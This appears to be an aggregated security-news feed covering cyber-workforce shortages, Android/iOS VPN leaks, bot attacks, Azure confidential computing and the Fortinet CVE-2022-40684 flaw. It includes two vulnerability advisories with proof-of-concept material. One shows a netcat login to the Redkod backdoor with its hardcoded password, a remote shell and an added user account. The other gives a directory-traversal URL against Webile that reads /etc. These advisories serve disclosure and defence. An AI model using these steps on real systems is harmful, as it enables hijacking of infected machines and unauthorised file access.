Just 65 cybersecurity professionals are in the workforce for every 100 available jobs, new study shows.

Widely reported shortages of trained cybersecurity professionals are driving the industry to try to come up with some with creative recruiting and training solutions. But it's complicated. 

At the very same time, automation is increasingly performing the tedious entry-level tasks that early-career threat hunters once built their chops working on, making it harder to gain early experience. 

The result is demand for job openings requiring some previous cybersecurity experience over the past year grew 2.4 times faster than the rate of the rest of the economy, while only 65 cybersecurity professionals are in the workforce for every 100 available jobs, according to newly released research from CyberSeek and partners National Initiative for Cybersecurity Education at NIST, Lightcast, and ComTIA. Overall there were some 769,736 cybersecurity job openings listed over the 12-month period ending in September of this year.

"The CyberSeek data reaffirms the critical importance of feeder roles and thinking more creatively about on-ramps and career pathways," Ron Culler, vice president cyber learning officer, CompTIA said about the cybersecurity employee recruitment study findings. "We see this trend continuing and are committed to ensuring that cybersecurity professionals are prepared for the current and future challenges this will bring."

Besides staffing up the security operations, employers are increasingly searching for potential hires with cybersecurity skill sets across other specialized areas of business including auditor, software developer, cloud architect, and tech support engineer, CyberSeek found. 

**Cybersecurity Experience Expectations Unrealistic **

In many cases, those demands for cybersecurity experience are unnecessary, Timothy Morris, chief security adviser with Tanium, tells Dark Reading.

"Degrees are not required for most cybersecurity jobs," Morris explains. "Provide on-the-job training with tuition assistance for degrees. Building great, world-class cybersecurity teams requires a skill diversity. I've had success with folks that have varied backgrounds (teachers, retailers, mechanics) seeking a new career." 

Instead, Morris suggests employers search out job seekers with curiosity and a passion for solving problems. 

Phil Neray, vice president of cyber-defense strategy at CardinalOps, agrees and suggests hiring managers looking for cybersecurity talent consider applicants with past job experience in crime and fraud investigations, history and foreign policy, data science, IT networking, and music.

"Hiring in a tough labor market requires a certain level of open-mindedness and intellectual humility on the part of the hiring manager," Neray tells Dark Reading. "There are lots of people with nontraditional backgrounds who can become excellent cybersecurity professionals because they exhibit key traits like a willingness to learn, an analytical 'hacker mindset' when discovering the unknown, creativity, and attention to detail."

Cybersecurity's Hiring Spree Requires a Recruiting Rethink

Backdoor.Win32.Redkod.d malware suffers from a hardcoded credential vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/bb309bdd071d5733efefe940a89fcbe8.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Redkod.d  
Vulnerability: Weak Hardcoded Credentials   
Description: The malware listens on TCP port 4820. Authentication is required, however the password "redkod" is weak and hardcoded in cleartext within the PE file.  
Family: Redkod  
Type: PE32  
MD5: bb309bdd071d5733efefe940a89fcbe8  
Vuln ID: MVID-2022-0649  
Disclosure: 10/16/2022

Exploit/PoC:  
C:\>nc64.exe x.x.x.x 4820  
===========================================================  
=                   RedKod Backdoor 1.0                   =  
=                        By R-e-D                         =  
=                  http://www.redkod.com                  =  
=                     r-e-d@redkod.com                    =  
===========================================================

Password: redkod

RBackdoor# exec calc  
msg: Execution effectuee avec succes

RBackdoor# setpass malvuln

RBackdoor# help  
COMMAND HELP:

 > Shell Commands :

CD          Permet de changer de repertoire courant  
CLEAR       Efface le buffer de la console  
COPY        Permet de copier un fichier  
DEL         Permet d'effacer un ou plusieurs fichier  
DIR         Permet de lister le contenu d'un repertoire  
FIND        Recherche un fichier a travers le path  
HELP        Affiche cette aide  
LS          Permet de lister le contenu d'un repertoire  
MD          Permet de creer un repertoire  
MOVE        Permet de deplacer un fichier ou un repertoire  
REN         Permet de renommer un fichier  
PWD         Permet de recuperer le repertoire courant  
RMDIR       Permet d'effacer un repertoire  
SHELL       Permet d'executer toute commande DOS sur le systeme cible

 > Informations Commands :

CLIP        Permet de recuperer le contenu du presse papier  
DISKINFO    Permet de recuperer des informations sur les disques durs  
GETGROUPS   Permet de recuperer des informations sur les groupes, les users, les            SID :)  
GETPROCESS  Recupere et affiche la liste des processus actifs  
GETSERVICES Permet d'afficher les services NT presents sur une machine local ou             distante  
LISTEVENT   Permet de lister les journaux du eventlog  
NETSHARE    Permer d'afficher les ressources partager de la machine local ou d'u            ne machine distante  
ENUMSERVER  Permet d'afficher les servers appartenant au domaine  
SYSINFO     Permet de recuperer des informations sur le systeme cible  
TIME        Affiche l'heure et la date du systeme distant  
UPTIME      Permet d'afficher depuis combien de temps le systeme fonctionne  
USERINFO    Permet d'obtenir des informations sur un utilisateur  
VERSION     Affiche la version de RBackdoor  
WHOAMI      Permet de recuperer l'utilisateur logge sur la machine

 > Interactions Commands :

ADDEVENT    Permet d'ajouter un evenement dans l'eventlog  
ADDSHARE    Permet d'ajouter une ressource partagee  
BEEP        Fait beeper le haut parleur interne  
CLEARLOG    Permet d'effacer un journal complet de l'eventlog  
DELSERVICE  Permet de supprimer un service present  
DELSHARE    Permet de retirer une ressource partagee  
EXEC        Permet d'executer une commande sur le systeme cible  
HEXEC       Permet d'executer une commande tout en cachant sa sortie  
LOGOFF      Permet de fermer la session de l'utilisateur courant  
KILLPROCESS Permet de killer un processus  
MOUSE       Permet de placer le curseur de la souris au coordonnees x et y                  voulues  
MSGBOX      Permet d'envoyer une boite de dialogue au systeme cible avec message            personalise  
RCHAT       Permet d'etablir une communication ecrite avec une personne etant pr            esent sur le pc distant  
REBOOT      Permet de redemarrer la machine  
SCREENSHOT  Permet de prendre un screenshot du bureau de la machine distante  
SENDKEY     Permet d'emuler la pression d'une touche du clavier  
SETNAME     Change le nom NetBios du serveur  
STARTSERVICE Permet de demarrer un servive present sur la machine serveur  
STOPSERVICE Permet de stopper un service present et demarrer

 > Administration of RBackdoor Commands :

EXIT        Permet de fermer la connection a la backdoor tout en laissant                   la backdoor active  
KILL        Permet de desactiver ou de reactiver la backdoor  
OPEN        Creer un nouveau processus de RBackdoor sur un autre port  
SETPASS     Permet de modifier le pass associe a la backdoor

 > RBackdoor Tools :

FGET        Permet de recuperer un fichier sur un serveur FTP  
FPUT        Permet d'uploader un fichier sur un serveur FTP  
MAIL        Permet d'envoyer un mail, etc...  
NETPATCH    Rootkit permettant de patcher netstat.exe pour cacher RBackdoor  
RCRYPT      Permet de crypter ou de decrypter un fichier  
RPATCH      Permet de patcher le systeme pour effacer rbackdoor  
RSHELL      Permet de lancer un vrai shell DOS  
SCAN        Permet de scanner les ports d'une hote distante  
TELNET      Permet de se connecter a une hote distante (TCP Protocol Only)  
VIEW        Permet de lire le contenu d'un fichier  
WGET        Recupere et d'affiche le contenu d'un fichier heberge sur un serveur            http  
WRITE       Permet d'ecrire directement dans un fichier

msg: Tapez help <command> pour des informations plus precises sur la commande voulue

RBackdoor# rshell  
                                 ATTENTION!!  
Pour fermer le shell veuillez tapez 'exit'! Sinon perte de la backdoor envisageable !

Microsoft Windows [Version 10.0.16299.309]  
(c) 2017 Microsoft Corporation. All rights reserved.

C:\dump>whoami  
whoami  
desktop-2c4jqho\victim

C:\dump>net user hyp3rlinx 666 /add  
net user hyp3rlinx 666 /add  
The command completed successfully.

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Redkod.d MVID-2022-0649 Hardcoded Credential

Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Directory Traversal

Categories: News
Tags: a week in security

Tags:  week in security

Tags:  AI Bill of Rights

Tags:  Final Fantasy XIV

Tags:  Lock and Code S03E21

Tags:  Meta

Tags:  WhatsApp

Tags:  ransomware

Tags:  tax scam

Tags:  Chinese APT

Tags:  Android

Tags:  Chrome

Tags:  iOS

Tags:  managed detection response

Tags:  MDR

Tags:  disinformation

Tags:  FBI

Tags:  CISA

The most important and interesting computer security stories from the last week.



(Read more...)




The post A week in security (October 10 - 16) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

Privacy VPN

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 10 - 16)

Categories: News
Tags: VPN

Tags:  iOS

Tags:  Android

Tags:  tunnel

Tags:  captive portal

Tags:  leak

Tags:  anonymity

“Block connections without VPN” doesn't block all connections without a VPN and “Always on VPN” isn't always on.



(Read more...)




The post Android and iOS leak some data outside VPNs appeared first on Malwarebytes Labs.

Virtual Private Networks (VPNs) on Android and iOS are in the news. It’s been discovered that in certain circumstances, some of your traffic is leaked so it ends up outside of the safety cordon created by the VPN.

Mullvad, the discoverers of this Android “feature” say that it has the potential to cause someone to be de-anonymised (but only in rare cases as it requires a fair amount of skill on behalf of the snooper). At least one Google engineer claims that this isn’t a major concern, is intended functionality, and will continue as is for the time being.

**MUL22-03**

The Android discovery, currently named MUL22-03, is not the VPN's fault. The transmission of data outside of the VPN is something which happens quite deliberately, to all brands of VPN, and not as the result of some sort of terrible hack or exploit. Although the full audit report has not yet been released, the information available so far may be worrying for some. According to the report, Android sends “connectivity checks” (traffic that determines if a connection has been made successfully) outside of whichever VPN tunnel you happen to have in place.

Perhaps confusingly, this also occurs whether or not you have “Block connections without VPN” or even “Always on VPN” switched on, which is (supposed) to do what you’d expect given the name. It’s quite reasonable to assume a setting which says one thing will not in fact do the opposite of that thing, so what is going on here?

The leakage arises as a result of certain special edge case scenarios, in which case Android will override the various “Do not do this without a VPN” settings. This would happen, for example, with something like a captive portal. A captive portal is something you typically access when joining a network—something like a hotspot sign-in page stored on a gateway.

Why? Because VPNs run on top of whatever Internet-connected network you are on, so you have to join a network before you can establish your VPN connection. Anything that happens before you establish your VPN connection can't be protected by it.

As per Bleeping Computer, this leakage can include DNS lookups, HTTPs traffic, IP addresses and (perhaps) NTP traffic (Network Time Protocol, a protocol for synchronising net-connected clocks).

Mullvad VPN first reported this a documentation issue, and then asked for a way to “...disable connectivity checks while 'Block connections without VPN' (from now on lockdown) is enabled for a VPN app.”

Google's response, via its issue tracker was “We do not think such an option would be understandable by most users, so we don't think there is a strong case for offering this.”

According to Google, disabling connectivity checks is a non-starter for four reasons: VPNs might actually be relying on them; "split channel" traffic that doesn't ever use the VPN might be relying on them; it isn't just connectivity checks that bypass the VPN anyway; and the data revealed by the connectivity checks is available elsewhere.

The rest is a back and forth debate on the pros and cons of this stance, which is still ongoing. At this point, Google is not budging.

**iOS has entered the chat**

It seems this isn’t something only confined to Android. There are similar things happening on iOS 16, with multiple Apple services claimed to be leaking outside of the VPN tunnel including maps, health, and wallet.

> We confirm that iOS 16 does communicate with Apple services outside an active VPN tunnel. Worse, it leaks DNS requests. #Apple services that escape the VPN connection include Health, Maps, Wallet.  
> We used @ProtonVPN and #Wireshark. Details in the video:#CyberSecurity #Privacy pic.twitter.com/ReUmfa67ln
> 
> — Mysk 🇨🇦🇩🇪 (@mysk\_co) October 12, 2022

According to Mysk, the traffic being sent to Apple isn't insecure, it's just going against what users expect.

> All of the traffic that appeared in the video is either encrypted or double encrypted. The issue here is about wrong assumptions. The user assumes that when the VPN is on, ALL traffic is tunneled through the VPN. But iOS doesn't tunnel everything. Android doesn't either.

They suggest that one way forward to stop this from happening would be to treat VPN apps as browsers and “require a special approval and entitlement from Apple”.

There probably won’t be much movement on this issue until the release of the full report on MUL22-03, but for now the opinion from those involved in testing seems to be that the risk is small.

Android and iOS leak some data outside VPNs

Plus: Hackers hit the Mormon Church, Signal plans to ditch SMS for Android, and a Fat Bear election erupts in scandal.

Users of the cryptocurrency exchange Celsius are in danger. Last week, as part of its bankruptcy proceedings, the company submitted a 14,500-page document that appears to contain the full names and recent transactions of its users. Typically private, this sensitive information ties people’s real-world identities to their once-anonymous cryptocurrency transactions, making them ripe targets for scammers and other criminals—and crypto-tracing investigators.

If you’re considering upgrading to the new Pixel 7 or Pixel 7 Pro, rest assured that Google put the phone’s security hardware through the wringer to make hacking the device as costly as possible. Not only that, the tech giant plans to roll out a built-in VPN for Android later this year.

For Windows 11 users, we walked through how to take advantage of Microsoft’s automatic phishing protection features. And for students and their parents, we explained exactly what to do to protect against school surveillance technology.

Finally, a Connecticut jury decided this week that Infowars host Alex Jones must pay nearly $1 billion in damages for defaming the families of victims of the 2012 mass shooting at Sandy Hook Elementary, as well as an FBI agent who responded to the horrific scene. The historic jury award doesn’t change what “free speech” means in the United States, but it might make social media platforms rethink their disinformation strategies.

But that’s not all! Each week, we round up the news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

SpaceX says it can no longer fund Starlink satellite internet service in war-torn Ukraine, according to documents obtained by CNN. More than 20,000 Starlink terminals have been donated to the country since Russia invaded in February, and the service has been a lifeline for Ukrainian military efforts. But the $120 million it will take to fund the service through the end of the year is too much for SpaceX, and the company has reportedly asked the Pentagon to pick up the bill going forward.

The move to pull funding comes at an inauspicious time for Elon Musk, SpaceX’s outspoken CEO. The leaked letter asking the Pentagon to pay for Ukraine’s Starlink terminals and service is dated September 8. Less than a month later, on October 3, Musk got into a fight on Twitter with Ukrainian officials after suggesting the country end the war by largely agreeing to Russia’s demands. While a report said that Musk had a call with Russian president Vladimir Putin prior to his tweet about Ukraine appeasing Russia, both the billionaire and the Kremlin deny the call took place.

The Church of Jesus Christ of Latter-Day Saints (often known as LDS or the Mormon Church) revealed this week that hackers breached its systems in late March. In a statement, the church said that it did not disclose the intrusion until now at the request of law enforcement. While LDS says that donation histories and payment card information were not accessed, the data may include “your username, membership record number, full name, gender, email address(es), birthdate, mailing address, phone number(s), and preferred language.” According to the church, federal authorities believe the breach was “part of a pattern of state-sponsored cyberattacks aimed at organizations and governments around the world that are not intended to cause harm to individuals.”

Signal users on Android collectively groaned this week after the Signal Foundation announced that it would no longer support SMS and MMS messaging in the app. The convenient feature allowed Android users to message anyone, regardless of whether they were on Signal, through the app. (Signal’s iOS version did not support this feature.) Signal said in its announcement that the move was due to the inherent insecurity of SMS and the potential for users to forget that they weren’t sending end-to–end encrypted messages to non-Signal contacts. Signal’s lead Android developer, Greyson Parrelli, added in a forum post that part of the reason Signal was ditching SMS and MMS was because Signal “doesn’t play well” with RCS, Google’s new messaging protocol.

Not even bear-based elections are safe these days. On Sunday, officials behind Katmai National Park’s annual Fat Bear Week contest discovered that someone had monkeyed with the vote by flooding it with some 9,000 fake ballots in favor of a bear named 435. Fat Bear election integrity officials soon discovered thousands of fake email addresses linked to the bogus ballots, corrected the tally, and added a captcha to the site to fend off the spammers. Ultimately, a 1,400-pound grizzly aptly named 747 overtook 435 by some 7,000 votes and won the competition. “Bears don’t actually get anything from competing in or winning Fat Bear Week,” Amber Kraft, who helps run the competition at the park, told _Bloomberg_. “Despite which bear wins the most votes in the Fat Bear Week competition, they are all winners.”

Elon Musk’s SpaceX Bails on Starlink Funding for Ukraine

By Waqas
Bot attacks rose by 41% in H1 2021, with the financial services and media industries facing the highest proportion…
This is a post from HackRead.com Read the original post: Rising Bot Attacks – Why is Your Organization Struggling to Deal with Them?

Bot attacks rose by 41% in H1 2021, with the financial services and media industries facing the highest proportion of these attacks. 71% of global CIOs/ CISOs admit that they have seen an increase in successful attacks, while 78% believe they had more customer churn and complaints owing to bot attacks. 

Despite the increase in successful bot-based attacks, many organizations are underprepared to fend off these lethal and increasingly stealthy attacks. Read on to know why your organization fails to mitigate bot attacks. 

Let’s discuss why organizations are unable to manage rising Bot attacks.

**Organizations are Underprepared **

Only 19% of organizations currently use full-fledged, comprehensive bot management solutions and programs, while 78% continue relying on WAFs, CDNs, and DDoS mitigation to prevent bot-based attacks.

This protects you only against ad frauds, influence fraud attacks, and card frauds, leaving you open to a wide range of more lethal, sophisticated attacks. 

**One-Third of Bots can Mimic Human Behaviour **

Like organizations adapting to the changing times, attackers are leveraging automation, AI, and ML to ensure bots can behave more human-like, from mouse movements to keystrokes and clicks.

Since 37% of bad bots can closely mimic human behaviour, they can seamlessly evade detection by traditional security tools and defenses. 

**Continuously Increasing Sophistication of Bot Attacks **

Malicious bots made up almost 28% of the global web traffic, a record high, in 2021. Of these, two-thirds were evasive bots capable of seamlessly evading security tools and defenses. They use techniques such as encrypted requests, anonymous proxies to enter websites and apps, masking/ changing identities, mimicking human behaviour, cycling through random IPs, and so on.

Bad bots also learn over time and automatically use different techniques to evade detection. Attackers leverage deep dark-web intelligence, highly sophisticated tools and the latest technology, mass data breaches, automated processes, and, most importantly, expansive global fraud networks to industrialize fraud and orchestrate attacks. This is another reason for the increasing sophistication of bot attacks. 

Further, attackers can easily customize attacks for each target. Attackers take time and effort to understand bot mitigation techniques and keep creating mutated versions of bot attacks to ensure they can keep evading detection. 

**The Array of New Endpoints Offers a Larger Attack Surface **

The attack surface has widened with the growing use of IoT devices, APIs, mobile devices, and microservices instead of single monolithic apps to offer better functionalities and user experiences. This has also led to increased misconfigurations, weaknesses, vulnerabilities, and security complexities that you can simply not get ahead of. 

These new endpoints, often under-protected or unprotected, become ripe targets for bot attacks. You cannot stop bot threats without comprehensive, advanced, and fully managed security solutions that include focused API bot mitigation. 

**Traditional Signature-Based Detection is Found Wanting **

Several organizations, even with dedicated bot security solutions, cannot stop complex bot attacks. This is because their bot management solution focuses on traditional signature-based detection techniques. 

Data suggest that bots are so smart and efficient today that automated attack signatures are three times more complicated than in previous years. To effectively stop these attacks, you would have to collect, review and correlate several data points to form a single attack signature. And this attack signature is bound to change as attackers constantly work to improve their modus operandi. 

You need behaviour, pattern, and heuristic analysis, fingerprinting, and workflow validation to stop the complex automated attacks of today. This helps you identify anomalous behaviours and stop them. When backed by machine learning and artificial intelligence, these solutions can automatically redefine normal variance in acceptable behaviours. 

**The Reliance on In-House Bot Management Solutions **

Several organizations continue to rely on in-house bot management solutions that are incapable of stopping the sophisticated automated threats of today. These solutions rely on signature-based detection. They only have access to internal data and past attack history but don’t have access to the global threat feeds. 

Without visibility into the range of bots, evasion techniques, and the latest attacks, it is impossible to get ahead of the latest threats. Further, organizations may not engage in continuous research to understand the latest threats and find ways to avert them. 

**The Way Forward**

To effectively avert and manage the latest breed of sophisticated and evasive bot attacks, you must invest in comprehensive, fully managed, and next-gen bot management solutions from trusted security experts like Indusface. This solution can identify and thwart bot attacks, including automated API bot threats. 

**More Bots News**

1.  Baby Got Bots
2.  Microsoft’s ‘Tay and You’ AI bot went completely Nazi
3.  Will good prevail over bad as bots battle for the internet?
4.  The Curious Case of Creepy Twitter Bot Spying and Posting Images

Rising Bot Attacks – Why is Your Organization Struggling to Deal with Them?

Microsoft highlighted emerging confidential computing offerings for Azure during its Ignite conference.

Microsoft is putting hardware in charge of data protection in Azure to help customers feel confident about sharing data with authorized parties within the cloud environment. The company made a series of hardware security announcements at its Ignite 2022 conference this week to highlight Azure's confidential computing offerings.

Confidential computing involves creating a Trusted Execution Environment (TEE), essentially a black box to hold encrypted data. In a process called attestation, authorized parties can place code inside the box to decrypt and access the information without first having to move the data out of the protected space. The hardware-protected enclave creates a trustworthy environment in which data is tamper-proof, and the data isn't accessible to even those with physical access to the server, a hypervisor, or even an application.

"It's really kind of the ultimate in data protection," Mark Russinovich, Microsoft Azure's chief technology officer, said at Ignite.

**On Board With AMD's Epyc**

Several of Microsoft's new hardware security layers take advantage of on-chip features included in Epyc — the server processor from Advanced Micro Devices deployed on Azure.

One such feature is SEV-SNP, which encrypts AI data when in a CPU. Machine-learning applications move data continuously between a CPU, accelerators, memory, and storage. AMD's SEV-SNP ensures data security inside the CPU environment, while locking off access to that information as it goes through the execution cycle.

AMD's SEV-SNP feature closes a critical gap so data is secure at all layers while residing or moving in the hardware. Other chip makers have largely focused on encrypting data while in storage and in transit on communication networks, but AMD's features secure data while being processed in the CPU.

That offers multiple benefits, and companies will be able to mix proprietary data with third-party datasets residing in other secure enclaves on Azure. The SEV-SNP features use attestation to ensure incoming data is in its exact form from a relying party and can be trusted.

"This is enabling net new scenarios and confidential computing that was not possible before," said Amar Gowda, principal product manager at Microsoft Azure, during an Ignite webcast.

For example, banks will be able to share confidential data without the fear of anyone stealing it. The SEV-SNP feature will bring encrypted bank data into the secure third-party enclave where it could mingle with datasets from other sources.

"Because of this attestation and memory protection and integrity protection, you can rest assured that the data does not leave the boundaries in the wrong hands. The whole thing is about how do you enable new offerings on top of this platform," Gowda said.

**Hardware Security on Virtual Machines**

Microsoft also added additional security for cloud-native workloads, and the non-exportable encryption keys generated using SEV-SNP are a logical fit for enclaves where data is transient and not retained, James Sanders, principal analyst for cloud, infrastructure, and quantum at CCS Insight, says in a conversation with Dark Reading.

"For Azure Virtual Desktop, SEV-SNP adds an additional layer of security for virtual-desktop use cases, including bring-your-own-device workplaces, remote work, and graphics-intensive applications," Sanders says.

Some workloads haven't moved to the cloud because of regulation and compliance limitations tied to data privacy and security. The hardware security layers will allow companies to migrate such workloads without compromising their security posture, Run Cai, a principal program manager at Microsoft, said during the conference.

Microsoft also announced that the Azure virtual desktop with confidential VM was in public preview, which will be able to run Windows 11 attestation on confidential VMs.

"You can use secure remote access with Windows Hello and also secure access to Microsoft Office 365 applications within confidential VMs," Cai said.

Microsoft has been dabbling with the use of AMD's SEV-SNP in general-purpose VMs from earlier this year, which was a good start, CCS Insight's Sanders says.

Adoption of SEV-SNP is also important validation for AMD among data center and cloud customers, as previous efforts at confidential computing relied on partial secure enclaves rather than protecting the entire host system.

"This was not straightforward to configure, and Microsoft left it to partners to provide security solutions that leveraged in-silicon security features," Sanders says.

Microsoft's Russinovich said that Azure services to manage hardware and deployment of code for confidential computing are coming. Many of those managed services will be based on Confidential Consortium Framework, which is a Microsoft-developed open source environment for confidential computing.

"Managed service is in preview form ... we've got customers that are kicking the tires on it," Russinovich said.

Microsoft Secures Azure Enclaves With Hardware Guards

The authentication bypass flaw in FortiOS, FortiProxy and FortiSwitchManager is easy to find and exploit, security experts say.

Concerns over a critical authentication bypass vulnerability in certain Fortinet appliances heightened this week with the release of proof-of-concept (PoC) exploit code and a big uptick in vulnerability scans for the flaw.

The bug (CVE-2022-40684) is present in multiple versions of Fortinet's FortiOS, FortiProxy and FortiSwitchManager technologies. It allows an unauthenticated attacker to gain administrative access to affected products via specially crafted HTTPS and HTTP requests, and potentially use that as entry point to the rest of the network.

Bharat Jogi, director of vulnerability threat research at Qualys says researchers at the company have observed mass scans being carried out by various threat actors to identify Internet facing vulnerable systems for compromise.

"They are compromising these systems to create a super\_admin user which provides them with complete access and control," Jogi says. "Once this level of access is achieved, they have the ability to delete any trace of their successful exploitation attempt, making it difficult for organizations to track compromised assets in their environment."

If this flaw is successfully exploited, an attacker would have complete access to the organization's internal systems that were previously protected by Fortinet's firewalls, he says. "Having a compromised firewall is like laying out a red carpet for threat actors to stroll right into your organization's environment," Jogi notes.

**Added to CISA's Known Exploited Vulnerabilities Catalog**

The US Cybersecurity and Infrastructure Security Agency (CISA) earlier this week added the vulnerability to its Known Exploited Vulnerabilities catalog. Federal executive branch agencies—which are required to remediate vulnerabilities in the catalog within specific deadlines—have until Nov. 1 to address it. Though the deadline applies only to federal agencies, security experts have previously noted how it is a good idea for all organizations to monitor the vulnerabilities in the catalog and follow CISA's deadline for implementing fixes.

Fortinet privately notified customers of the affected products about the vulnerability last Friday, along with instructions to immediately update to patched versions of the technology the company had just released. It advised companies that could not update for any reason to immediately disable Internet-facing HTTPS administration until they could upgrade to the patched versions. 

"Due to the ability to exploit this issue remotely, Fortinet is strongly recommending all customers with the vulnerable versions to perform an immediate upgrade," Fortinet said in its private notification, a copy of which was posted on Twitter the same day.

Fortinet followed up with a public vulnerability advisory on Monday describing the flaw and warning customers of potential exploit activity. The company said it was aware of instances where attackers had exploited the vulnerability to download the configuration file from affected systems and to add a malicious super\_admin account called "fortigate-tech-support".

Since then, penetration testing from Horizon3.ai has released proof-of-concept code for exploiting the vulnerability along with a technical deep dive of the flaw. A template for scanning for the vulnerability has also become available on GitHub.

